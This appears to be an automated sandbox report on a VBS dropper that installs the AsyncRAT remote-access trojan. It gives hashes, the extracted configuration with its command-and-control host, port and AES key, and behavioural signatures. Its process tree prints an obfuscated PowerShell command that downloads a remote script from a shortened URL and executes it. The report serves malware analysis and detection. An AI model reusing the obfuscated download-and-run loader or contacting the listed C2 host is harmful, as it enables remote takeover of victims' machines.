Analysis
-
max time kernel
73s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
24-07-2021 07:11
Static task
static1
Behavioral task
behavioral1
Sample
BGWA373.vbs
Resource
win7v20210408
General
-
Target
BGWA373.vbs
-
Size
662B
-
MD5
0aaf99120926cd036d4e12bf6bd9529e
-
SHA1
b4c8b77fd55e4ba131d17137c5e8aeea2fae5a7a
-
SHA256
1c80b7c0a15cb2c6685b9eb72124e4b4dd5b7f80f60acc59d0d24f863610feb0
-
SHA512
64ee05a4b8e1a849c715a56469b95856232bc57182e4c1b6e8eeebfb2331c39811b7bbd1eea4161f3cc9dd2915b7c38a4ed18873824663a764207f42eb533570
Malware Config
Extracted
asyncrat
0.5.7B
newfrost.ddns.net:6666
AsyncMutex_6SI8OkPnk
-
aes_key
i7qGeRW2Orm1I0pgfxYOISTcRoWU7fSK
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
newfrost.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6666
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1456-353-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/1456-354-0x000000000040C73E-mapping.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 10 4008 powershell.exe 14 4008 powershell.exe 19 4008 powershell.exe 20 4008 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3228 set thread context of 1456 3228 powershell.exe ngentask.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 4008 powershell.exe 4008 powershell.exe 4008 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe 3228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exengentask.exedescription pid process Token: SeDebugPrivilege 4008 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 1456 ngentask.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 856 wrote to memory of 4008 856 WScript.exe powershell.exe PID 856 wrote to memory of 4008 856 WScript.exe powershell.exe PID 4008 wrote to memory of 3228 4008 powershell.exe powershell.exe PID 4008 wrote to memory of 3228 4008 powershell.exe powershell.exe PID 3228 wrote to memory of 1144 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1144 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1144 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe PID 3228 wrote to memory of 1456 3228 powershell.exe ngentask.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BGWA373.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3wVvbjD'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ToT.ps1MD5
8f8c2450bc9cffbd58c9f5b636352117
SHA1ca15532c513d81cd0ce02d15215a92cb0de02161
SHA256a0e4c425360270c90af50799d89a5f5c011d7108c92deeba06c8c1cf180ae4d1
SHA512f342b2ac3c55b3a72375526c900cf2273556d81dceab97c32e0ddc1c194fffcd3418a1348431b1e1b044784354eb9b9a8d5f6987fd4397650d693c36367ed98a
-
memory/1456-366-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/1456-365-0x0000000005C70000-0x0000000005C71000-memory.dmpFilesize
4KB
-
memory/1456-364-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB
-
memory/1456-363-0x0000000004E90000-0x0000000004E91000-memory.dmpFilesize
4KB
-
memory/1456-354-0x000000000040C73E-mapping.dmp
-
memory/1456-353-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3228-350-0x000001D5A8826000-0x000001D5A8828000-memory.dmpFilesize
8KB
-
memory/3228-329-0x000001D5A8823000-0x000001D5A8825000-memory.dmpFilesize
8KB
-
memory/3228-332-0x000001D5C26D0000-0x000001D5C26D1000-memory.dmpFilesize
4KB
-
memory/3228-328-0x000001D5A8820000-0x000001D5A8822000-memory.dmpFilesize
8KB
-
memory/3228-349-0x000001D5C2690000-0x000001D5C269E000-memory.dmpFilesize
56KB
-
memory/3228-308-0x0000000000000000-mapping.dmp
-
memory/4008-114-0x0000000000000000-mapping.dmp
-
memory/4008-307-0x0000016705076000-0x0000016705078000-memory.dmpFilesize
8KB
-
memory/4008-124-0x0000016705073000-0x0000016705075000-memory.dmpFilesize
8KB
-
memory/4008-123-0x0000016705070000-0x0000016705072000-memory.dmpFilesize
8KB
-
memory/4008-122-0x000001671DAD0000-0x000001671DAD1000-memory.dmpFilesize
4KB
-
memory/4008-119-0x000001671D550000-0x000001671D551000-memory.dmpFilesize
4KB